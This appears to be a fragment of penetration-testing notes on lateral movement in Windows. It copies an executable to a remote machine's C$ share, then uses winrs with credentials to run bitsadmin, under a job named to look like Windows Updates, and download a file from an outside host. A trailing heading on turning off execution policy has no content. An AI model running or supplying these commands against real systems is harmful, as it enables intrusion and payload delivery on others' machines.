Notes
# Copy file to the machine
echo F | xcopy C:\Users\myuser\file.exe \\teste-machine\c$\Users\Public\file.exe /Y
winrs -r:<machine> -u:<user> -p:<pass> "bitsadmin /transfer WindowsUpdates /priority normal http://<ip>/<file> C:\\Users\\Public\\<file>"Turn off Execution Policy:
Last updated